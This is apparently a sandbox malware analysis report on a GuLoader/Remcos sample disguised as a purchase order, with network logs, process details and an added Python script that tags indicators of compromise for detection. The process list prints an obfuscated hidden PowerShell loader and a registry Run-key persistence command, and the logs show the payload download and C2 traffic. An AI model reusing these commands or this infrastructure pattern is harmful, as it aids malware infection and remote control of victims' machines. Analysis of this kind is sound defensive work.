USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2024 06:04:02.902920008 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:02.902965069 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:02.903043032 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:02.912241936 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:02.912257910 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:03.434931040 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:03.435121059 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:03.479645967 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:03.479669094 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:03.479898930 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:03.480335951 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:03.482693911 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:03.524121046 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:04.432444096 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:04.432513952 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:04.432519913 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:04.432557106 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:04.435972929 CEST | 49713 | 443 | 192.168.2.5 | 13.107.137.11
May 13, 2024 06:04:04.436001062 CEST | 443 | 49713 | 13.107.137.11 | 192.168.2.5
May 13, 2024 06:04:07.066996098 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:07.413810015 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:07.413924932 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:07.416974068 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:07.802228928 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:07.844105005 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:08.191034079 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:08.213608980 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:08.610280991 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:08.610366106 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:09.016627073 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:09.109905005 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:09.156639099 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:09.503473997 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:09.547689915 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:09.726208925 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:09.930118084 CEST | 49716 | 80 | 192.168.2.5 | 178.237.33.50
May 13, 2024 06:04:10.128483057 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:10.236584902 CEST | 80 | 49716 | 178.237.33.50 | 192.168.2.5
May 13, 2024 06:04:10.236665010 CEST | 49716 | 80 | 192.168.2.5 | 178.237.33.50
May 13, 2024 06:04:10.237616062 CEST | 49716 | 80 | 192.168.2.5 | 178.237.33.50
May 13, 2024 06:04:10.548712969 CEST | 80 | 49716 | 178.237.33.50 | 192.168.2.5
May 13, 2024 06:04:10.548789024 CEST | 49716 | 80 | 192.168.2.5 | 178.237.33.50
May 13, 2024 06:04:10.566118002 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:10.956862926 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:11.547836065 CEST | 80 | 49716 | 178.237.33.50 | 192.168.2.5
May 13, 2024 06:04:11.547904968 CEST | 49716 | 80 | 192.168.2.5 | 178.237.33.50
May 13, 2024 06:04:12.437547922 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:12.439389944 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:12.842987061 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:42.450043917 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
May 13, 2024 06:04:42.451807976 CEST | 49715 | 6426 | 192.168.2.5 | 103.253.17.222
May 13, 2024 06:04:42.858130932 CEST | 6426 | 49715 | 103.253.17.222 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2024 06:04:02.742290974 CEST | 54487 | 53 | 192.168.2.5 | 1.1.1.1
May 13, 2024 06:04:04.445508957 CEST | 50457 | 53 | 192.168.2.5 | 1.1.1.1
May 13, 2024 06:04:06.893347979 CEST | 54989 | 53 | 192.168.2.5 | 1.1.1.1
May 13, 2024 06:04:07.066059113 CEST | 53 | 54989 | 1.1.1.1 | 192.168.2.5
May 13, 2024 06:04:09.768071890 CEST | 51534 | 53 | 192.168.2.5 | 1.1.1.1
May 13, 2024 06:04:09.924969912 CEST | 53 | 51534 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 13, 2024 06:04:02.742290974 CEST | 192.168.2.5 | 1.1.1.1 | 0xd937 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:04.445508957 CEST | 192.168.2.5 | 1.1.1.1 | 0xa437 | Standard query (0) | kxwbha.am.files.1drv.com | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:06.893347979 CEST | 192.168.2.5 | 1.1.1.1 | 0x44dc | Standard query (0) | tochisglobal.ddns.net | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:09.768071890 CEST | 192.168.2.5 | 1.1.1.1 | 0xb14d | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 13, 2024 06:04:02.896969080 CEST | 1.1.1.1 | 192.168.2.5 | 0xd937 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
May 13, 2024 06:04:02.896969080 CEST | 1.1.1.1 | 192.168.2.5 | 0xd937 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
May 13, 2024 06:04:02.896969080 CEST | 1.1.1.1 | 192.168.2.5 | 0xd937 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
May 13, 2024 06:04:02.896969080 CEST | 1.1.1.1 | 192.168.2.5 | 0xd937 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:02.896969080 CEST | 1.1.1.1 | 192.168.2.5 | 0xd937 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:04.655276060 CEST | 1.1.1.1 | 192.168.2.5 | 0xa437 | No error (0) | kxwbha.am.files.1drv.com | am-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
May 13, 2024 06:04:04.655276060 CEST | 1.1.1.1 | 192.168.2.5 | 0xa437 | No error (0) | am-files.fe.1drv.com | odc-am-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
May 13, 2024 06:04:07.066059113 CEST | 1.1.1.1 | 192.168.2.5 | 0x44dc | No error (0) | tochisglobal.ddns.net | | 103.253.17.222 | A (IP address) | IN (0x0001) | false
May 13, 2024 06:04:09.924969912 CEST | 1.1.1.1 | 192.168.2.5 | 0xb14d | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                        • onedrive.live.com
                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49716 | 178.237.33.50 | 80 | 6008 | C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
Timestamp | Bytes transferred | Direction | Data
May 13, 2024 06:04:10.237616062 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
May 13, 2024 06:04:10.548712969 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                        date: Mon, 13 May 2024 04:04:10 GMT
                                                        server: Apache
                                                        content-length: 965
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 32 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"191.101.61.26", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49713 | 13.107.137.11 | 443 | 6008 | C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-13 04:04:03 UTC | 271 | OUT | GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: onedrive.live.com
                                                        Cache-Control: no-cache
                                                        Cookie: MUID=02A1F39C44B160352D6AE03C40B16444
2024-05-13 04:04:04 UTC | 1180 | IN | HTTP/1.1 302 Found
                                                        Cache-Control: no-cache, no-store
                                                        Pragma: no-cache
                                                        Content-Type: text/html
                                                        Expires: -1
                                                        Location: https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4fA1MzcbPI83B_rXGbHf-ALSMmG7RkEdUQfjG2DyUucMWek9XIj3tn-7NAvq05pAnKWs1FMqyEpy_p6z5TEzLcKsUS12WYssawolVl0gOo85JGvcYIGUARfgxfUiP2PHZImAlpS5vGCbqTzkD6Gn_lQ/kDJUXtnufqHS82.bin?download&psid=1
                                                        Set-Cookie: E=P:V+AzugFz3Ig=:Zqcl3ZNb2DqYW5w/XxAGG3eBDZpKUcfktZAAbv85CHg=:F; domain=.live.com; path=/
                                                        Set-Cookie: xid=6ea35cc1-ef79-4469-ab4b-b73da4724b9f&&ODSP-ODWEB-ODCF&173; domain=.live.com; path=/
                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 13-May-2024 02:24:03 GMT; path=/
                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 20-May-2024 04:04:04 GMT; path=/
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-MSNServer: 5f77c98dd4-hkqzl
                                                        X-ODWebServer: namsouthce155880-odwebpl
                                                        X-Cache: CONFIG_NOCACHE
                                                        X-MSEdge-Ref: Ref A: 389F65DCB5184660A881CD35E2D87B35 Ref B: BY3EDGE0520 Ref C: 2024-05-13T04:04:03Z
                                                        Date: Mon, 13 May 2024 04:04:03 GMT
                                                        Connection: close
                                                        Content-Length: 0
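The network tables above give the whole delivery and check-in chain of this sample in flattened form: a OneDrive download that is redirected to a `1drv.com` `.bin`, a long-lived session on TCP 6426 to a host behind a dynamic-DNS name, and an unauthenticated `GET /json.gp` to geoplugin.net sent without a User-Agent. The script below is an added example, not part of the Joe Sandbox report: it takes the DNS answers, TCP sessions and HTTP exchanges (constructed here from the rows above; the garbled akadns-to-msedge CNAME hop is collapsed into one record) and produces a tagged IOC list. The dynamic-DNS suffix list and the geolocation-service list are assumptions to be replaced with your own intelligence.

```python
"""Added example, not part of the Joe Sandbox report: turn the DNS, TCP and
HTTP tables into a tagged IOC list. Every row below is constructed from the
report; the provider lists are assumptions."""
from urllib.parse import urlsplit

DDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org")   # assumption
GEOIP_HOSTS = {"geoplugin.net", "ip-api.com", "ipinfo.io"}      # assumption
STANDARD_PORTS = {53, 80, 443}

# (query name, record type, value). The akadns -> msedge hop is collapsed
# into a single CNAME because the report shows that row garbled.
DNS_ANSWERS = [
    ("onedrive.live.com", "CNAME", "web.fe.1drv.com"),
    ("web.fe.1drv.com", "CNAME", "odc-web-geo.onedrive.akadns.net"),
    ("odc-web-geo.onedrive.akadns.net", "CNAME", "dual-spov-0006.spov-msedge.net"),
    ("dual-spov-0006.spov-msedge.net", "A", "13.107.137.11"),
    ("dual-spov-0006.spov-msedge.net", "A", "13.107.139.11"),
    ("kxwbha.am.files.1drv.com", "CNAME", "am-files.fe.1drv.com"),
    ("am-files.fe.1drv.com", "CNAME", "odc-am-files-geo.onedrive.akadns.net"),
    ("tochisglobal.ddns.net", "A", "103.253.17.222"),
    ("geoplugin.net", "A", "178.237.33.50"),
]
# One entry per TCP session from the sandbox host: (destination IP, port).
TCP_SESSIONS = [("13.107.137.11", 443), ("103.253.17.222", 6426), ("178.237.33.50", 80)]
# (host, request line, request headers, Location header of the response or None)
HTTP_EXCHANGES = [
    ("onedrive.live.com",
     "GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1",
     {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
      "Cache-Control": "no-cache"},
     "https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4fA1MzcbPI83B_rXGbHf-ALSMmG7RkEdUQfjG2DyUucMWek9XIj3tn-7NAvq05pAnKWs1FMqyEpy_p6z5TEzLcKsUS12WYssawolVl0gOo85JGvcYIGUARfgxfUiP2PHZImAlpS5vGCbqTzkD6Gn_lQ/kDJUXtnufqHS82.bin?download&psid=1"),
    ("geoplugin.net", "GET /json.gp HTTP/1.1", {"Cache-Control": "no-cache"}, None),
]


def resolve(answers=DNS_ANSWERS):
    """Map every name in the answers to the IPs it ends at, following CNAMEs."""
    cname, addrs = {}, {}
    for name, rtype, value in answers:
        if rtype == "CNAME":
            cname[name] = value
        elif rtype == "A":
            addrs.setdefault(name, set()).add(value)
    resolved = {}
    for name in set(cname) | set(addrs):
        target, seen = name, set()
        while target in cname and target not in seen:   # guard against CNAME loops
            seen.add(target)
            target = cname[target]
        resolved[name] = addrs.get(target, set())       # empty if the chain never hit an A record
    return resolved


def tag_sessions(sessions=TCP_SESSIONS, answers=DNS_ANSWERS):
    """One finding per TCP session: which names led to the IP and why it matters."""
    resolved = resolve(answers)
    findings = []
    for ip, port in sessions:
        names = sorted(n for n, ips in resolved.items() if ip in ips)
        tags = []
        if not names:
            tags.append("unresolved-destination")       # hard-coded IP, no DNS lookup
        if any(n.endswith(DDNS_SUFFIXES) for n in names):
            tags.append("dynamic-dns")
        if any(n in GEOIP_HOSTS for n in names):
            tags.append("geoip-check")
        if port not in STANDARD_PORTS:
            tags.append("non-standard-port")
        findings.append({"dst": f"{ip}:{port}", "names": names, "tags": tags})
    return findings


def redirect_target(location):
    """Host and file name a 302 Location header points at."""
    parts = urlsplit(location)
    return parts.hostname, parts.path.rsplit("/", 1)[-1]


def http_findings(exchanges=HTTP_EXCHANGES):
    """Flag requests without a User-Agent and resolve redirects to their final file."""
    out = []
    for host, request, headers, location in exchanges:
        tags = []
        if "User-Agent" not in headers:
            tags.append("no-user-agent")
        if location:
            tags.append("redirect:%s/%s" % redirect_target(location))
        out.append({"host": host, "path": request.split()[1], "tags": tags})
    return out


if __name__ == "__main__":
    for finding in tag_sessions() + http_findings():
        print(finding)
```

Two things worth noticing in the output: `kxwbha.am.files.1drv.com` resolves only to CNAMEs in the captured answers and no TCP session to it appears in the table, so the report itself does not show the `.bin` being fetched; and the 6426 session is the only one tagged both `dynamic-dns` and `non-standard-port`, which is the pair to turn into a network detection.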


                                                        Target ID:0
                                                        Start time:06:02:46
                                                        Start date:13/05/2024
                                                        Path:C:\Users\user\Desktop\Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                        Imagebase:0x400000
                                                        File size:580'232 bytes
                                                        MD5 hash:996CD1A4008E0FCA3750E9524BD13A9D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:06:02:48
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
                                                        Imagebase:0x2d0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:06:02:48
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:06:02:49
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:06:03:51
                                                        Start date:13/05/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
                                                        Imagebase:0x400000
                                                        File size:580'232 bytes
                                                        MD5 hash:996CD1A4008E0FCA3750E9524BD13A9D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 8%, ReversingLabs
                                                        • Detection: 21%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
                                                        Imagebase:0x110000
                                                        File size:59'392 bytes
                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:25%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.1%
                                                          Total number of Nodes:1249
                                                          Total number of Limit Nodes:35
3434->3435 3435->3432 3437 40549b 3436->3437 3438 40549f GetLastError 3436->3438 3437->3302 3438->3437 3439->3304 3440->3315 3442 4059dc GetTickCount GetTempFileNameA 3441->3442 3443 40310d 3442->3443 3444 405a09 3442->3444 3443->3251 3444->3442 3444->3443 3445->3332 3446->3334 3447->3338 3449 402c23 3448->3449 3450 402c0b 3448->3450 3453 402c33 GetTickCount 3449->3453 3454 402c2b 3449->3454 3451 402c14 DestroyWindow 3450->3451 3452 402c1b 3450->3452 3451->3452 3452->3341 3456 402c41 CreateDialogParamA ShowWindow 3453->3456 3457 402c64 3453->3457 3455 406104 2 API calls 3454->3455 3458 402c31 3455->3458 3456->3457 3457->3341 3458->3341 3459->3348 3460->3347 3462 403988 3461->3462 3472 405c8d wsprintfA 3462->3472 3464 4039f9 3465 405d51 18 API calls 3464->3465 3466 403a05 SetWindowTextA 3465->3466 3467 403a21 3466->3467 3468 403734 3466->3468 3467->3468 3469 405d51 18 API calls 3467->3469 3468->3371 3469->3467 3470->3368 3471->3373 3472->3464 3474 403628 3473->3474 3475 40362d FreeLibrary GlobalFree 3474->3475 3476 4035f2 3474->3476 3475->3475 3475->3476 3476->3422 3477 402410 3478 402b44 19 API calls 3477->3478 3479 40241a 3478->3479 3480 402a3a 18 API calls 3479->3480 3481 402423 3480->3481 3482 40242d RegQueryValueExA 3481->3482 3486 4026a6 3481->3486 3483 402453 RegCloseKey 3482->3483 3484 40244d 3482->3484 3483->3486 3484->3483 3488 405c8d wsprintfA 3484->3488 3488->3483 3980 401490 3981 404f48 25 API calls 3980->3981 3982 401497 3981->3982 3983 401f90 3984 401fa2 3983->3984 3985 402050 3983->3985 3986 402a3a 18 API calls 3984->3986 3987 401423 25 API calls 3985->3987 3988 401fa9 3986->3988 3994 4021c9 3987->3994 3989 402a3a 18 API calls 3988->3989 3990 401fb2 3989->3990 3991 401fc7 LoadLibraryExA 3990->3991 3992 401fba GetModuleHandleA 3990->3992 3991->3985 3993 401fd7 GetProcAddress 3991->3993 3992->3991 3992->3993 3995 402023 3993->3995 3996 401fe6 3993->3996 3997 404f48 25 API calls 3995->3997 3998 401423 25 API calls 3996->3998 3999 401ff6 3996->3999 
